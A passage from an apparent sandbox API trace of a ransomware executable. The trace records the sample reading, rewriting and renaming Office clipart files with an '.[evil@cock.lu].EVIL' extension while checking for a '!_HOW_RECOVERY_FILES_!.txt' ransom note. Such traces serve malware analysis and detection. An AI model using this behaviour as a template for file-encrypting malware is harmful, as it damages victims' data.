Office\\root\\CLIPART\\PUB60COR\\SL00256_.WMF") returned 69 [0167.885] wcscmp (_String1="SL00256_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0167.885] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="SL00256_.WMF") returned 0x0 [0167.885] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SL00256_.WMF") returned 0x45 [0167.885] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SL00256_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\sl00256_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0167.887] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e28040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x2a0a, lpOverlapped=0x0) returned 1 [0167.891] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0167.891] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0167.891] _errno () returned 0x84b1160840 [0167.891] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0167.891] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e28040*, nNumberOfBytesToWrite=0x2a20, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x2a20, lpOverlapped=0x0) returned 1 [0167.891] CloseHandle (hObject=0x1a8) returned 1 [0167.892] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SL00256_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0167.892] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0167.892] __uncaught_exception () returned 0x84b1160800 [0167.892] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0167.892] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SL00256_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\sl00256_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SL00256_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\sl00256_.wmf.[evil@cock.lu].evil")) returned 1 [0167.893] ??_V@YAXPEAX@Z () returned 0x1 [0167.896] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SL00256_.WMF", dwFileAttributes=0x200) returned 0 [0167.897] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0167.897] wcsstr (_Str="SL00260_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0167.897] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SL00260_.WMF") returned 69 [0167.897] wcscmp (_String1="SL00260_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0167.897] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="SL00260_.WMF") returned 0x0 [0167.897] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SL00260_.WMF") returned 0x45 [0167.897] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SL00260_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\sl00260_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0167.899] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b303f040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x7ca4, lpOverlapped=0x0) returned 1 [0167.912] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0167.912] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0167.912] _errno () returned 0x84b1160840 [0167.913] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0167.913] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b303f040*, nNumberOfBytesToWrite=0x7cc0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x7cc0, lpOverlapped=0x0) returned 1 [0167.913] CloseHandle (hObject=0x1a8) returned 1 [0167.913] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SL00260_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0167.913] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0167.913] __uncaught_exception () returned 0x84b1160800 [0167.913] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0167.914] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SL00260_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\sl00260_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SL00260_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\sl00260_.wmf.[evil@cock.lu].evil")) returned 1 [0167.914] ??_V@YAXPEAX@Z () returned 0x1 [0167.918] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SL00260_.WMF", dwFileAttributes=0x200) returned 0 [0167.918] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0167.918] wcsstr (_Str="SL00268_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0167.918] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SL00268_.WMF") returned 69 [0167.918] wcscmp (_String1="SL00268_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0167.918] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="SL00268_.WMF") returned 0x0 [0167.918] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SL00268_.WMF") returned 0x45 [0167.918] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SL00268_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\sl00268_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0167.920] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2a040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xf5c, lpOverlapped=0x0) returned 1 [0167.935] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0167.935] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0167.935] _errno () returned 0x84b1160840 [0167.935] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0167.935] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2a040*, nNumberOfBytesToWrite=0xf60, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xf60, lpOverlapped=0x0) returned 1 [0167.935] CloseHandle (hObject=0x1a8) returned 1 [0167.935] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SL00268_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0167.935] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0167.936] __uncaught_exception () returned 0x84b1160800 [0167.936] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0167.936] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SL00268_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\sl00268_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SL00268_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\sl00268_.wmf.[evil@cock.lu].evil")) returned 1 [0167.937] ??_V@YAXPEAX@Z () returned 0x1 [0167.940] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SL00268_.WMF", dwFileAttributes=0x200) returned 0 [0167.940] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0167.940] wcsstr (_Str="SL00286_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0167.940] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SL00286_.WMF") returned 69 [0167.940] wcscmp (_String1="SL00286_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0167.940] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="SL00286_.WMF") returned 0x0 [0167.940] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SL00286_.WMF") returned 0x45 [0167.940] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SL00286_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\sl00286_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0167.943] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e26040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e26040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1dac, lpOverlapped=0x0) returned 1 [0167.948] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0167.948] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0167.948] _errno () returned 0x84b1160840 [0167.948] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0167.948] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e26040*, nNumberOfBytesToWrite=0x1dc0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e26040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1dc0, lpOverlapped=0x0) returned 1 [0167.949] CloseHandle (hObject=0x1a8) returned 1 [0167.949] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SL00286_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0167.949] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0167.949] __uncaught_exception () returned 0x84b1160800 [0167.949] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0167.949] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SL00286_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\sl00286_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SL00286_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\sl00286_.wmf.[evil@cock.lu].evil")) returned 1 [0167.950] ??_V@YAXPEAX@Z () returned 0x1 [0167.953] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SL00286_.WMF", dwFileAttributes=0x200) returned 0 [0167.953] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0167.953] wcsstr (_Str="SL00298_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0167.953] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SL00298_.WMF") returned 69 [0167.953] wcscmp (_String1="SL00298_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0167.953] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="SL00298_.WMF") returned 0x0 [0167.953] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SL00298_.WMF") returned 0x45 [0167.953] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SL00298_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\sl00298_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0167.955] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2e040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1268, lpOverlapped=0x0) returned 1 [0167.962] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0167.962] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0167.962] _errno () returned 0x84b1160840 [0167.962] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0167.962] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2e040*, nNumberOfBytesToWrite=0x1280, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1280, lpOverlapped=0x0) returned 1 [0167.962] CloseHandle (hObject=0x1a8) returned 1 [0167.963] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SL00298_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0167.963] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0167.963] __uncaught_exception () returned 0x84b1160800 [0167.963] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0167.963] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SL00298_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\sl00298_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SL00298_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\sl00298_.wmf.[evil@cock.lu].evil")) returned 1 [0167.964] ??_V@YAXPEAX@Z () returned 0x1 [0167.967] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SL00298_.WMF", dwFileAttributes=0x200) returned 0 [0167.967] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0167.967] wcsstr (_Str="SL00308_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0167.967] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SL00308_.WMF") returned 69 [0167.967] wcscmp (_String1="SL00308_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0167.967] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="SL00308_.WMF") returned 0x0 [0167.967] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SL00308_.WMF") returned 0x45 [0167.967] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SL00308_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\sl00308_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0167.969] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e24040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x20e0, lpOverlapped=0x0) returned 1 [0167.976] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0167.976] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0167.976] _errno () returned 0x84b1160840 [0167.976] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0167.976] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e24040*, nNumberOfBytesToWrite=0x2100, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x2100, lpOverlapped=0x0) returned 1 [0167.976] CloseHandle (hObject=0x1a8) returned 1 [0167.976] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SL00308_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0167.976] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0167.976] __uncaught_exception () returned 0x84b1160800 [0167.976] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0167.977] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SL00308_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\sl00308_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SL00308_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\sl00308_.wmf.[evil@cock.lu].evil")) returned 1 [0167.977] ??_V@YAXPEAX@Z () returned 0x1 [0167.980] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SL00308_.WMF", dwFileAttributes=0x200) returned 0 [0167.980] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0167.980] wcsstr (_Str="SL00345_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0167.980] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SL00345_.WMF") returned 69 [0167.980] wcscmp (_String1="SL00345_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0167.980] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="SL00345_.WMF") returned 0x0 [0167.980] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SL00345_.WMF") returned 0x45 [0167.980] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SL00345_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\sl00345_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0167.982] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xae4, lpOverlapped=0x0) returned 1 [0167.989] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0167.989] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0167.989] _errno () returned 0x84b1160840 [0167.989] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0167.989] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040*, nNumberOfBytesToWrite=0xb00, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xb00, lpOverlapped=0x0) returned 1 [0167.989] CloseHandle (hObject=0x1a8) returned 1 [0167.989] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SL00345_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0167.989] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0167.989] __uncaught_exception () returned 0x84b1160800 [0167.989] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0167.990] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SL00345_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\sl00345_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SL00345_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\sl00345_.wmf.[evil@cock.lu].evil")) returned 1 [0167.990] ??_V@YAXPEAX@Z () returned 0x1 [0167.993] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SL00345_.WMF", dwFileAttributes=0x200) returned 0 [0167.993] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0167.993] wcsstr (_Str="SL00452_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0167.993] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SL00452_.WMF") returned 69 [0167.993] wcscmp (_String1="SL00452_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0167.993] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="SL00452_.WMF") returned 0x0 [0167.993] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SL00452_.WMF") returned 0x45 [0167.993] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SL00452_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\sl00452_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0167.995] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2c040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x540, lpOverlapped=0x0) returned 1 [0168.005] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0168.005] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0168.005] _errno () returned 0x84b1160840 [0168.005] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0168.005] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2c040*, nNumberOfBytesToWrite=0x560, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x560, lpOverlapped=0x0) returned 1 [0168.005] CloseHandle (hObject=0x1a8) returned 1 [0168.005] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SL00452_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0168.006] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0168.006] __uncaught_exception () returned 0x84b1160800 [0168.006] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0168.006] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SL00452_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\sl00452_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SL00452_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\sl00452_.wmf.[evil@cock.lu].evil")) returned 1 [0168.007] ??_V@YAXPEAX@Z () returned 0x1 [0168.010] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SL00452_.WMF", dwFileAttributes=0x200) returned 0 [0168.011] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0168.011] wcsstr (_Str="SL00712_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0168.011] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SL00712_.WMF") returned 69 [0168.011] wcscmp (_String1="SL00712_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0168.011] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="SL00712_.WMF") returned 0x0 [0168.011] wcslen (_String="C:\\\\Program Files\\Microsoft 